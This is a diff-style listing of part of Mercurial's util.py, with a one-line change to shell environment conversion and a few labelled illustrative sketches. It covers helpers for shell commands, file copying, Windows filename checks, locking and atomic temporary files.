1002 1002 code = os.system(cmd)
1003 1003 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1004 1004 code = 0
1005 1005 if code:
1006 1006 raise Abort(_("command '%s' failed: %s") %
1007 1007 (cmd, explainexit(code)))
1008 1008 return readfile(outname)
1009 1009 finally:
1010 1010 try:
1011 1011 if inname:
1012 1012 os.unlink(inname)
1013 1013 except OSError:
1014 1014 pass
1015 1015 try:
1016 1016 if outname:
1017 1017 os.unlink(outname)
1018 1018 except OSError:
1019 1019 pass
1020 1020
1021 1021 filtertable = {
1022 1022 'tempfile:': tempfilter,
1023 1023 'pipe:': pipefilter,
1024 1024 }
1025 1025
1026 1026 def filter(s, cmd):
1027 1027 "filter a string through a command that transforms its input to its output"
1028 1028 for name, fn in filtertable.iteritems():
1029 1029 if cmd.startswith(name):
1030 1030 return fn(s, cmd[len(name):].lstrip())
1031 1031 return pipefilter(s, cmd)
1032 1032
1033 1033 def binary(s):
1034 1034 """return true if a string is binary data"""
1035 1035 return bool(s and '\0' in s)
1036 1036
1037 1037 def increasingchunks(source, min=1024, max=65536):
1038 1038 '''return no less than min bytes per chunk while data remains,
1039 1039 doubling min after each chunk until it reaches max'''
1040 1040 def log2(x):
1041 1041 if not x:
1042 1042 return 0
1043 1043 i = 0
1044 1044 while x:
1045 1045 x >>= 1
1046 1046 i += 1
1047 1047 return i - 1
1048 1048
1049 1049 buf = []
1050 1050 blen = 0
1051 1051 for chunk in source:
1052 1052 buf.append(chunk)
1053 1053 blen += len(chunk)
1054 1054 if blen >= min:
1055 1055 if min < max:
1056 1056 min = min << 1
1057 1057 nmin = 1 << log2(blen)
1058 1058 if nmin > min:
1059 1059 min = nmin
1060 1060 if min > max:
1061 1061 min = max
1062 1062 yield ''.join(buf)
1063 1063 blen = 0
1064 1064 buf = []
1065 1065 if buf:
1066 1066 yield ''.join(buf)
1067 1067
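# Illustrative sketch (editor's addition, not part of util.py): many
# small chunks come back joined into progressively larger ones.
chunks = (b'x' * 100 for _ in range(100))          # 10000 bytes total
sizes = [len(c) for c in increasingchunks(chunks)]
# min doubles after each yield (1024, 2048, 4096, ...), so sizes here
# work out to [1100, 2100, 4100, 2700] (the final yield flushes the rest)
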
1068 1068 Abort = error.Abort
1069 1069
1070 1070 def always(fn):
1071 1071 return True
1072 1072
1073 1073 def never(fn):
1074 1074 return False
1075 1075
1076 1076 def nogc(func):
1077 1077 """disable garbage collector
1078 1078
1079 1079 Python's garbage collector triggers a GC each time a certain number of
1080 1080 container objects (the number being defined by gc.get_threshold()) are
1081 1081 allocated even when marked not to be tracked by the collector. Tracking has
1082 1082 no effect on when GCs are triggered, only on what objects the GC looks
1083 1083 into. As a workaround, disable GC while building complex (huge)
1084 1084 containers.
1085 1085
1086 1086 This garbage collector issue has been fixed in 2.7, but it still affects
1087 1087 CPython's performance.
1088 1088 """
1089 1089 def wrapper(*args, **kwargs):
1090 1090 gcenabled = gc.isenabled()
1091 1091 gc.disable()
1092 1092 try:
1093 1093 return func(*args, **kwargs)
1094 1094 finally:
1095 1095 if gcenabled:
1096 1096 gc.enable()
1097 1097 return wrapper
1098 1098
1099 1099 if pycompat.ispypy:
1100 1100 # PyPy runs slower with gc disabled
1101 1101 nogc = lambda x: x
1102 1102
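# Illustrative sketch (editor's addition, not part of util.py): nogc is
# applied as a decorator around code that builds huge containers.
@nogc
def buildhugemapping(pairs):
    # GC stays disabled for the duration of the call, avoiding repeated
    # collections while the dict is being populated
    return dict(pairs)
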
1103 1103 def pathto(root, n1, n2):
1104 1104 '''return the relative path from one place to another.
1105 1105 root should use os.sep to separate directories
1106 1106 n1 should use os.sep to separate directories
1107 1107 n2 should use "/" to separate directories
1108 1108 returns an os.sep-separated path.
1109 1109
1110 1110 If n1 is a relative path, it's assumed it's
1111 1111 relative to root.
1112 1112 n2 should always be relative to root.
1113 1113 '''
1114 1114 if not n1:
1115 1115 return localpath(n2)
1116 1116 if os.path.isabs(n1):
1117 1117 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1118 1118 return os.path.join(root, localpath(n2))
1119 1119 n2 = '/'.join((pconvert(root), n2))
1120 1120 a, b = splitpath(n1), n2.split('/')
1121 1121 a.reverse()
1122 1122 b.reverse()
1123 1123 while a and b and a[-1] == b[-1]:
1124 1124 a.pop()
1125 1125 b.pop()
1126 1126 b.reverse()
1127 1127 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1128 1128
1129 1129 def mainfrozen():
1130 1130 """return True if we are a frozen executable.
1131 1131
1132 1132 The code supports py2exe (most common, Windows only) and tools/freeze
1133 1133 (portable, not much used).
1134 1134 """
1135 1135 return (safehasattr(sys, "frozen") or # new py2exe
1136 1136 safehasattr(sys, "importers") or # old py2exe
1137 1137 imp.is_frozen(u"__main__")) # tools/freeze
1138 1138
1139 1139 # the location of data files matching the source code
1140 1140 if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1141 1141 # executable version (py2exe) doesn't support __file__
1142 1142 datapath = os.path.dirname(pycompat.sysexecutable)
1143 1143 else:
1144 1144 datapath = os.path.dirname(pycompat.fsencode(__file__))
1145 1145
1146 1146 i18n.setdatapath(datapath)
1147 1147
1148 1148 _hgexecutable = None
1149 1149
1150 1150 def hgexecutable():
1151 1151 """return location of the 'hg' executable.
1152 1152
1153 1153 Defaults to $HG or 'hg' in the search path.
1154 1154 """
1155 1155 if _hgexecutable is None:
1156 1156 hg = encoding.environ.get('HG')
1157 1157 mainmod = sys.modules[pycompat.sysstr('__main__')]
1158 1158 if hg:
1159 1159 _sethgexecutable(hg)
1160 1160 elif mainfrozen():
1161 1161 if getattr(sys, 'frozen', None) == 'macosx_app':
1162 1162 # Env variable set by py2app
1163 1163 _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
1164 1164 else:
1165 1165 _sethgexecutable(pycompat.sysexecutable)
1166 1166 elif (os.path.basename(
1167 1167 pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
1168 1168 _sethgexecutable(pycompat.fsencode(mainmod.__file__))
1169 1169 else:
1170 1170 exe = findexe('hg') or os.path.basename(sys.argv[0])
1171 1171 _sethgexecutable(exe)
1172 1172 return _hgexecutable
1173 1173
1174 1174 def _sethgexecutable(path):
1175 1175 """set location of the 'hg' executable"""
1176 1176 global _hgexecutable
1177 1177 _hgexecutable = path
1178 1178
1179 1179 def _isstdout(f):
1180 1180 fileno = getattr(f, 'fileno', None)
1181 1181 return fileno and fileno() == sys.__stdout__.fileno()
1182 1182
1183 1183 def shellenviron(environ=None):
1184 1184 """return environ with optional override, useful for shelling out"""
1185 1185 def py2shell(val):
1186 1186 'convert a python object into a string that is useful to the shell'
1187 1187 if val is None or val is False:
1188 1188 return '0'
1189 1189 if val is True:
1190 1190 return '1'
1191 return str(val)
1191 return pycompat.bytestr(val)
1192 1192 env = dict(encoding.environ)
1193 1193 if environ:
1194 1194 env.update((k, py2shell(v)) for k, v in environ.iteritems())
1195 1195 env['HG'] = hgexecutable()
1196 1196 return env
1197 1197
1198 1198 def system(cmd, environ=None, cwd=None, out=None):
1199 1199 '''enhanced shell command execution.
1200 1200 run with environment maybe modified, maybe in different dir.
1201 1201
1202 1202 if out is specified, it is assumed to be a file-like object that has a
1203 1203 write() method. stdout and stderr will be redirected to out.'''
1204 1204 try:
1205 1205 stdout.flush()
1206 1206 except Exception:
1207 1207 pass
1208 1208 cmd = quotecommand(cmd)
1209 1209 env = shellenviron(environ)
1210 1210 if out is None or _isstdout(out):
1211 1211 rc = subprocess.call(cmd, shell=True, close_fds=closefds,
1212 1212 env=env, cwd=cwd)
1213 1213 else:
1214 1214 proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
1215 1215 env=env, cwd=cwd, stdout=subprocess.PIPE,
1216 1216 stderr=subprocess.STDOUT)
1217 1217 for line in iter(proc.stdout.readline, ''):
1218 1218 out.write(line)
1219 1219 proc.wait()
1220 1220 rc = proc.returncode
1221 1221 if pycompat.sysplatform == 'OpenVMS' and rc & 1:
1222 1222 rc = 0
1223 1223 return rc
1224 1224
1225 1225 def checksignature(func):
1226 1226 '''wrap a function with code to check for calling errors'''
1227 1227 def check(*args, **kwargs):
1228 1228 try:
1229 1229 return func(*args, **kwargs)
1230 1230 except TypeError:
1231 1231 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1232 1232 raise error.SignatureError
1233 1233 raise
1234 1234
1235 1235 return check
1236 1236
1237 1237 # a whitelist of known filesystems where hardlinks work reliably
1238 1238 _hardlinkfswhitelist = {
1239 1239 'btrfs',
1240 1240 'ext2',
1241 1241 'ext3',
1242 1242 'ext4',
1243 1243 'hfs',
1244 1244 'jfs',
1245 1245 'NTFS',
1246 1246 'reiserfs',
1247 1247 'tmpfs',
1248 1248 'ufs',
1249 1249 'xfs',
1250 1250 'zfs',
1251 1251 }
1252 1252
1253 1253 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1254 1254 '''copy a file, preserving mode and optionally other stat info like
1255 1255 atime/mtime
1256 1256
1257 1257 checkambig argument is used with filestat, and is useful only if
1258 1258 destination file is guarded by any lock (e.g. repo.lock or
1259 1259 repo.wlock).
1260 1260
1261 1261 copystat and checkambig should be exclusive.
1262 1262 '''
1263 1263 assert not (copystat and checkambig)
1264 1264 oldstat = None
1265 1265 if os.path.lexists(dest):
1266 1266 if checkambig:
1267 1267 oldstat = checkambig and filestat.frompath(dest)
1268 1268 unlink(dest)
1269 1269 if hardlink:
1270 1270 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1271 1271 # unless we are confident that dest is on a whitelisted filesystem.
1272 1272 try:
1273 1273 fstype = getfstype(os.path.dirname(dest))
1274 1274 except OSError:
1275 1275 fstype = None
1276 1276 if fstype not in _hardlinkfswhitelist:
1277 1277 hardlink = False
1278 1278 if hardlink:
1279 1279 try:
1280 1280 oslink(src, dest)
1281 1281 return
1282 1282 except (IOError, OSError):
1283 1283 pass # fall back to normal copy
1284 1284 if os.path.islink(src):
1285 1285 os.symlink(os.readlink(src), dest)
1286 1286 # copytime is ignored for symlinks, but in general copytime isn't needed
1287 1287 # for them anyway
1288 1288 else:
1289 1289 try:
1290 1290 shutil.copyfile(src, dest)
1291 1291 if copystat:
1292 1292 # copystat also copies mode
1293 1293 shutil.copystat(src, dest)
1294 1294 else:
1295 1295 shutil.copymode(src, dest)
1296 1296 if oldstat and oldstat.stat:
1297 1297 newstat = filestat.frompath(dest)
1298 1298 if newstat.isambig(oldstat):
1299 1299 # stat of copied file is ambiguous to original one
1300 1300 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1301 1301 os.utime(dest, (advanced, advanced))
1302 1302 except shutil.Error as inst:
1303 1303 raise Abort(str(inst))
1304 1304
1305 1305 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1306 1306 """Copy a directory tree using hardlinks if possible."""
1307 1307 num = 0
1308 1308
1309 1309 gettopic = lambda: hardlink and _('linking') or _('copying')
1310 1310
1311 1311 if os.path.isdir(src):
1312 1312 if hardlink is None:
1313 1313 hardlink = (os.stat(src).st_dev ==
1314 1314 os.stat(os.path.dirname(dst)).st_dev)
1315 1315 topic = gettopic()
1316 1316 os.mkdir(dst)
1317 1317 for name, kind in listdir(src):
1318 1318 srcname = os.path.join(src, name)
1319 1319 dstname = os.path.join(dst, name)
1320 1320 def nprog(t, pos):
1321 1321 if pos is not None:
1322 1322 return progress(t, pos + num)
1323 1323 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1324 1324 num += n
1325 1325 else:
1326 1326 if hardlink is None:
1327 1327 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1328 1328 os.stat(os.path.dirname(dst)).st_dev)
1329 1329 topic = gettopic()
1330 1330
1331 1331 if hardlink:
1332 1332 try:
1333 1333 oslink(src, dst)
1334 1334 except (IOError, OSError):
1335 1335 hardlink = False
1336 1336 shutil.copy(src, dst)
1337 1337 else:
1338 1338 shutil.copy(src, dst)
1339 1339 num += 1
1340 1340 progress(topic, num)
1341 1341 progress(topic, None)
1342 1342
1343 1343 return hardlink, num
1344 1344
1345 1345 _winreservednames = {
1346 1346 'con', 'prn', 'aux', 'nul',
1347 1347 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1348 1348 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1349 1349 }
1350 1350 _winreservedchars = ':*?"<>|'
1351 1351 def checkwinfilename(path):
1352 1352 r'''Check that the base-relative path is a valid filename on Windows.
1353 1353 Returns None if the path is ok, or a UI string describing the problem.
1354 1354
1355 1355 >>> checkwinfilename(b"just/a/normal/path")
1356 1356 >>> checkwinfilename(b"foo/bar/con.xml")
1357 1357 "filename contains 'con', which is reserved on Windows"
1358 1358 >>> checkwinfilename(b"foo/con.xml/bar")
1359 1359 "filename contains 'con', which is reserved on Windows"
1360 1360 >>> checkwinfilename(b"foo/bar/xml.con")
1361 1361 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1362 1362 "filename contains 'AUX', which is reserved on Windows"
1363 1363 >>> checkwinfilename(b"foo/bar/bla:.txt")
1364 1364 "filename contains ':', which is reserved on Windows"
1365 1365 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1366 1366 "filename contains '\\x07', which is invalid on Windows"
1367 1367 >>> checkwinfilename(b"foo/bar/bla ")
1368 1368 "filename ends with ' ', which is not allowed on Windows"
1369 1369 >>> checkwinfilename(b"../bar")
1370 1370 >>> checkwinfilename(b"foo\\")
1371 1371 "filename ends with '\\', which is invalid on Windows"
1372 1372 >>> checkwinfilename(b"foo\\/bar")
1373 1373 "directory name ends with '\\', which is invalid on Windows"
1374 1374 '''
1375 1375 if path.endswith('\\'):
1376 1376 return _("filename ends with '\\', which is invalid on Windows")
1377 1377 if '\\/' in path:
1378 1378 return _("directory name ends with '\\', which is invalid on Windows")
1379 1379 for n in path.replace('\\', '/').split('/'):
1380 1380 if not n:
1381 1381 continue
1382 1382 for c in _filenamebytestr(n):
1383 1383 if c in _winreservedchars:
1384 1384 return _("filename contains '%s', which is reserved "
1385 1385 "on Windows") % c
1386 1386 if ord(c) <= 31:
1387 1387 return _("filename contains '%s', which is invalid "
1388 1388 "on Windows") % escapestr(c)
1389 1389 base = n.split('.')[0]
1390 1390 if base and base.lower() in _winreservednames:
1391 1391 return _("filename contains '%s', which is reserved "
1392 1392 "on Windows") % base
1393 1393 t = n[-1:]
1394 1394 if t in '. ' and n not in '..':
1395 1395 return _("filename ends with '%s', which is not allowed "
1396 1396 "on Windows") % t
1397 1397
1398 1398 if pycompat.iswindows:
1399 1399 checkosfilename = checkwinfilename
1400 1400 timer = time.clock
1401 1401 else:
1402 1402 checkosfilename = platform.checkosfilename
1403 1403 timer = time.time
1404 1404
1405 1405 if safehasattr(time, "perf_counter"):
1406 1406 timer = time.perf_counter
1407 1407
1408 1408 def makelock(info, pathname):
1409 1409 try:
1410 1410 return os.symlink(info, pathname)
1411 1411 except OSError as why:
1412 1412 if why.errno == errno.EEXIST:
1413 1413 raise
1414 1414 except AttributeError: # no symlink in os
1415 1415 pass
1416 1416
1417 1417 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1418 1418 os.write(ld, info)
1419 1419 os.close(ld)
1420 1420
1421 1421 def readlock(pathname):
1422 1422 try:
1423 1423 return os.readlink(pathname)
1424 1424 except OSError as why:
1425 1425 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1426 1426 raise
1427 1427 except AttributeError: # no symlink in os
1428 1428 pass
1429 1429 fp = posixfile(pathname)
1430 1430 r = fp.read()
1431 1431 fp.close()
1432 1432 return r
1433 1433
1434 1434 def fstat(fp):
1435 1435 '''stat file object that may not have fileno method.'''
1436 1436 try:
1437 1437 return os.fstat(fp.fileno())
1438 1438 except AttributeError:
1439 1439 return os.stat(fp.name)
1440 1440
1441 1441 # File system features
1442 1442
1443 1443 def fscasesensitive(path):
1444 1444 """
1445 1445 Return true if the given path is on a case-sensitive filesystem
1446 1446
1447 1447 Requires a path (like /foo/.hg) ending with a foldable final
1448 1448 directory component.
1449 1449 """
1450 1450 s1 = os.lstat(path)
1451 1451 d, b = os.path.split(path)
1452 1452 b2 = b.upper()
1453 1453 if b == b2:
1454 1454 b2 = b.lower()
1455 1455 if b == b2:
1456 1456 return True # no evidence against case sensitivity
1457 1457 p2 = os.path.join(d, b2)
1458 1458 try:
1459 1459 s2 = os.lstat(p2)
1460 1460 if s2 == s1:
1461 1461 return False
1462 1462 return True
1463 1463 except OSError:
1464 1464 return True
1465 1465
1466 1466 try:
1467 1467 import re2
1468 1468 _re2 = None
1469 1469 except ImportError:
1470 1470 _re2 = False
1471 1471
1472 1472 class _re(object):
1473 1473 def _checkre2(self):
1474 1474 global _re2
1475 1475 try:
1476 1476 # check if match works, see issue3964
1477 1477 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1478 1478 except ImportError:
1479 1479 _re2 = False
1480 1480
1481 1481 def compile(self, pat, flags=0):
1482 1482 '''Compile a regular expression, using re2 if possible
1483 1483
1484 1484 For best performance, use only re2-compatible regexp features. The
1485 1485 only flags from the re module that are re2-compatible are
1486 1486 IGNORECASE and MULTILINE.'''
1487 1487 if _re2 is None:
1488 1488 self._checkre2()
1489 1489 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1490 1490 if flags & remod.IGNORECASE:
1491 1491 pat = '(?i)' + pat
1492 1492 if flags & remod.MULTILINE:
1493 1493 pat = '(?m)' + pat
1494 1494 try:
1495 1495 return re2.compile(pat)
1496 1496 except re2.error:
1497 1497 pass
1498 1498 return remod.compile(pat, flags)
1499 1499
1500 1500 @propertycache
1501 1501 def escape(self):
1502 1502 '''Return the version of escape corresponding to self.compile.
1503 1503
1504 1504 This is imperfect because whether re2 or re is used for a particular
1505 1505 function depends on the flags, etc, but it's the best we can do.
1506 1506 '''
1507 1507 global _re2
1508 1508 if _re2 is None:
1509 1509 self._checkre2()
1510 1510 if _re2:
1511 1511 return re2.escape
1512 1512 else:
1513 1513 return remod.escape
1514 1514
1515 1515 re = _re()
1516 1516
1517 1517 _fspathcache = {}
1518 1518 def fspath(name, root):
1519 1519 '''Get name in the case stored in the filesystem
1520 1520
1521 1521 The name should be relative to root, and be normcase-ed for efficiency.
1522 1522
1523 1523 Note that this function is unnecessary, and should not be
1524 1524 called, for case-sensitive filesystems (simply because it's expensive).
1525 1525
1526 1526 The root should be normcase-ed, too.
1527 1527 '''
1528 1528 def _makefspathcacheentry(dir):
1529 1529 return dict((normcase(n), n) for n in os.listdir(dir))
1530 1530
1531 1531 seps = pycompat.ossep
1532 1532 if pycompat.osaltsep:
1533 1533 seps = seps + pycompat.osaltsep
1534 1534 # Protect backslashes. This gets silly very quickly.
1535 1535 seps = seps.replace('\\', '\\\\')
1536 1536 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1537 1537 dir = os.path.normpath(root)
1538 1538 result = []
1539 1539 for part, sep in pattern.findall(name):
1540 1540 if sep:
1541 1541 result.append(sep)
1542 1542 continue
1543 1543
1544 1544 if dir not in _fspathcache:
1545 1545 _fspathcache[dir] = _makefspathcacheentry(dir)
1546 1546 contents = _fspathcache[dir]
1547 1547
1548 1548 found = contents.get(part)
1549 1549 if not found:
1550 1550 # retry "once per directory" per "dirstate.walk" which
1551 1551 # may take place for each patch of "hg qpush", for example
1552 1552 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1553 1553 found = contents.get(part)
1554 1554
1555 1555 result.append(found or part)
1556 1556 dir = os.path.join(dir, part)
1557 1557
1558 1558 return ''.join(result)
1559 1559
1560 1560 def checknlink(testfile):
1561 1561 '''check whether hardlink count reporting works properly'''
1562 1562
1563 1563 # testfile may be open, so we need a separate file for checking to
1564 1564 # work around issue2543 (or testfile may get lost on Samba shares)
1565 1565 f1, f2, fp = None, None, None
1566 1566 try:
1567 1567 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1568 1568 suffix='1~', dir=os.path.dirname(testfile))
1569 1569 os.close(fd)
1570 1570 f2 = '%s2~' % f1[:-2]
1571 1571
1572 1572 oslink(f1, f2)
1573 1573 # nlinks() may behave differently for files on Windows shares if
1574 1574 # the file is open.
1575 1575 fp = posixfile(f2)
1576 1576 return nlinks(f2) > 1
1577 1577 except OSError:
1578 1578 return False
1579 1579 finally:
1580 1580 if fp is not None:
1581 1581 fp.close()
1582 1582 for f in (f1, f2):
1583 1583 try:
1584 1584 if f is not None:
1585 1585 os.unlink(f)
1586 1586 except OSError:
1587 1587 pass
1588 1588
1589 1589 def endswithsep(path):
1590 1590 '''Check path ends with os.sep or os.altsep.'''
1591 1591 return (path.endswith(pycompat.ossep)
1592 1592 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1593 1593
1594 1594 def splitpath(path):
1595 1595 '''Split path by os.sep.
1596 1596 Note that this function does not use os.altsep because it is
1597 1597 intended as a simple alternative to "xxx.split(os.sep)".
1598 1598 It is recommended to use os.path.normpath() before using this
1599 1599 function if needed.'''
1600 1600 return path.split(pycompat.ossep)
1601 1601
1602 1602 def gui():
1603 1603 '''Are we running in a GUI?'''
1604 1604 if pycompat.isdarwin:
1605 1605 if 'SSH_CONNECTION' in encoding.environ:
1606 1606 # handle SSH access to a box where the user is logged in
1607 1607 return False
1608 1608 elif getattr(osutil, 'isgui', None):
1609 1609 # check if a CoreGraphics session is available
1610 1610 return osutil.isgui()
1611 1611 else:
1612 1612 # pure build; use a safe default
1613 1613 return True
1614 1614 else:
1615 1615 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1616 1616
1617 1617 def mktempcopy(name, emptyok=False, createmode=None):
1618 1618 """Create a temporary file with the same contents from name
1619 1619
1620 1620 The permission bits are copied from the original file.
1621 1621
1622 1622 If the temporary file is going to be truncated immediately, you
1623 1623 can use emptyok=True as an optimization.
1624 1624
1625 1625 Returns the name of the temporary file.
1626 1626 """
1627 1627 d, fn = os.path.split(name)
1628 1628 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1629 1629 os.close(fd)
1630 1630 # Temporary files are created with mode 0600, which is usually not
1631 1631 # what we want. If the original file already exists, just copy
1632 1632 # its mode. Otherwise, manually obey umask.
1633 1633 copymode(name, temp, createmode)
1634 1634 if emptyok:
1635 1635 return temp
1636 1636 try:
1637 1637 try:
1638 1638 ifp = posixfile(name, "rb")
1639 1639 except IOError as inst:
1640 1640 if inst.errno == errno.ENOENT:
1641 1641 return temp
1642 1642 if not getattr(inst, 'filename', None):
1643 1643 inst.filename = name
1644 1644 raise
1645 1645 ofp = posixfile(temp, "wb")
1646 1646 for chunk in filechunkiter(ifp):
1647 1647 ofp.write(chunk)
1648 1648 ifp.close()
1649 1649 ofp.close()
1650 1650 except: # re-raises
1651 1651 try:
1652 1652 os.unlink(temp)
1653 1653 except OSError:
1654 1654 pass
1655 1655 raise
1656 1656 return temp
1657 1657
1658 1658 class filestat(object):
1659 1659 """help to exactly detect change of a file
1660 1660
1661 1661 'stat' attribute is result of 'os.stat()' if specified 'path'
1662 1662 exists. Otherwise, it is None. This can avoid preparative
1663 1663 'exists()' examination on client side of this class.
1664 1664 """
1665 1665 def __init__(self, stat):
1666 1666 self.stat = stat
1667 1667
1668 1668 @classmethod
1669 1669 def frompath(cls, path):
1670 1670 try:
1671 1671 stat = os.stat(path)
1672 1672 except OSError as err:
1673 1673 if err.errno != errno.ENOENT:
1674 1674 raise
1675 1675 stat = None
1676 1676 return cls(stat)
1677 1677
1678 1678 @classmethod
1679 1679 def fromfp(cls, fp):
1680 1680 stat = os.fstat(fp.fileno())
1681 1681 return cls(stat)
1682 1682
1683 1683 __hash__ = object.__hash__
1684 1684
1685 1685 def __eq__(self, old):
1686 1686 try:
1687 1687 # if ambiguity between stat of new and old file is
1688 1688 # avoided, comparison of size, ctime and mtime is enough
1689 1689 # to exactly detect change of a file regardless of platform
1690 1690 return (self.stat.st_size == old.stat.st_size and
1691 1691 self.stat.st_ctime == old.stat.st_ctime and
1692 1692 self.stat.st_mtime == old.stat.st_mtime)
1693 1693 except AttributeError:
1694 1694 pass
1695 1695 try:
1696 1696 return self.stat is None and old.stat is None
1697 1697 except AttributeError:
1698 1698 return False
1699 1699
1700 1700 def isambig(self, old):
1701 1701 """Examine whether new (= self) stat is ambiguous against old one
1702 1702
1703 1703 "S[N]" below means stat of a file at N-th change:
1704 1704
1705 1705 - S[n-1].ctime < S[n].ctime: can detect change of a file
1706 1706 - S[n-1].ctime == S[n].ctime
1707 1707 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1708 1708 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1709 1709 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1710 1710 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1711 1711
1712 1712 Case (*2) above means that a file was changed twice or more within
1713 1713 the same second (= S[n-1].ctime), so comparison of timestamps
1714 1714 is ambiguous.
1715 1715
1716 1716 The basic idea to avoid such ambiguity is "advance mtime by 1 second
1717 1717 if the timestamp is ambiguous".
1718 1718
1719 1719 But advancing mtime only in case (*2) doesn't work as
1720 1720 expected, because naturally advanced S[n].mtime in case (*1)
1721 1721 might be equal to manually advanced S[n-1 or earlier].mtime.
1722 1722
1723 1723 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
1724 1724 treated as ambiguous regardless of mtime, to avoid overlooking
1725 1725 a change hidden by a conflict between such mtimes.
1726 1726
1727 1727 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
1728 1728 S[n].mtime", even if size of a file isn't changed.
1729 1729 """
1730 1730 try:
1731 1731 return (self.stat.st_ctime == old.stat.st_ctime)
1732 1732 except AttributeError:
1733 1733 return False
1734 1734
1735 1735 def avoidambig(self, path, old):
1736 1736 """Change file stat of specified path to avoid ambiguity
1737 1737
1738 1738 'old' should be previous filestat of 'path'.
1739 1739
1740 1740 If the process doesn't have appropriate privileges for 'path',
1741 1741 this skips the ambiguity avoidance and returns False in that
1742 1742 case.
1743 1743
1744 1744 Otherwise, this returns True, as "ambiguity is avoided".
1745 1745 """
1746 1746 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1747 1747 try:
1748 1748 os.utime(path, (advanced, advanced))
1749 1749 except OSError as inst:
1750 1750 if inst.errno == errno.EPERM:
1751 1751 # utime() on the file created by another user causes EPERM,
1752 1752 # if a process doesn't have appropriate privileges
1753 1753 return False
1754 1754 raise
1755 1755 return True
1756 1756
1757 1757 def __ne__(self, other):
1758 1758 return not self == other
1759 1759
1760 1760 class atomictempfile(object):
1761 1761 '''writable file object that atomically updates a file
1762 1762
1763 1763 All writes will go to a temporary copy of the original file. Call
1764 1764 close() when you are done writing, and atomictempfile will rename
1765 1765 the temporary copy to the original name, making the changes
1766 1766 visible. If the object is destroyed without being closed, all your
1767 1767 writes are discarded.
1768 1768
1769 1769 The checkambig argument of the constructor is used with filestat,
1770 1770 and is useful only if the target file is guarded by a lock (e.g.
1771 1771 repo.lock or repo.wlock).
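
    A minimal usage sketch (illustrative; 'filename' is a hypothetical
    target path):

      with atomictempfile('filename', 'wb') as fp:
          fp.write(b'some data')
      # on a normal exit, close() renames the temporary copy over
      # 'filename'; on an exception, discard() throws the writes away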
1772 1772 '''
1773 1773 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1774 1774 self.__name = name # permanent name
1775 1775 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1776 1776 createmode=createmode)
1777 1777 self._fp = posixfile(self._tempname, mode)
1778 1778 self._checkambig = checkambig
1779 1779
1780 1780 # delegated methods
1781 1781 self.read = self._fp.read
1782 1782 self.write = self._fp.write
1783 1783 self.seek = self._fp.seek
1784 1784 self.tell = self._fp.tell
1785 1785 self.fileno = self._fp.fileno
1786 1786
1787 1787 def close(self):
1788 1788 if not self._fp.closed:
1789 1789 self._fp.close()
1790 1790 filename = localpath(self.__name)
1791 1791 oldstat = self._checkambig and filestat.frompath(filename)
1792 1792 if oldstat and oldstat.stat:
1793 1793 rename(self._tempname, filename)
1794 1794 newstat = filestat.frompath(filename)
1795 1795 if newstat.isambig(oldstat):
1796 1796 # stat of changed file is ambiguous to original one
1797 1797 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1798 1798 os.utime(filename, (advanced, advanced))
1799 1799 else:
1800 1800 rename(self._tempname, filename)
1801 1801
1802 1802 def discard(self):
1803 1803 if not self._fp.closed:
1804 1804 try:
1805 1805 os.unlink(self._tempname)
1806 1806 except OSError:
1807 1807 pass
1808 1808 self._fp.close()
1809 1809
1810 1810 def __del__(self):
1811 1811 if safehasattr(self, '_fp'): # constructor actually did something
1812 1812 self.discard()
1813 1813
1814 1814 def __enter__(self):
1815 1815 return self
1816 1816
1817 1817 def __exit__(self, exctype, excvalue, traceback):
1818 1818 if exctype is not None:
1819 1819 self.discard()
1820 1820 else:
1821 1821 self.close()
1822 1822
1823 1823 def unlinkpath(f, ignoremissing=False):
1824 1824 """unlink and remove the directory if it is empty"""
1825 1825 if ignoremissing:
1826 1826 tryunlink(f)
1827 1827 else:
1828 1828 unlink(f)
1829 1829 # try removing directories that might now be empty
1830 1830 try:
1831 1831 removedirs(os.path.dirname(f))
1832 1832 except OSError:
1833 1833 pass
1834 1834
1835 1835 def tryunlink(f):
1836 1836 """Attempt to remove a file, ignoring ENOENT errors."""
1837 1837 try:
1838 1838 unlink(f)
1839 1839 except OSError as e:
1840 1840 if e.errno != errno.ENOENT:
1841 1841 raise
1842 1842
1843 1843 def makedirs(name, mode=None, notindexed=False):
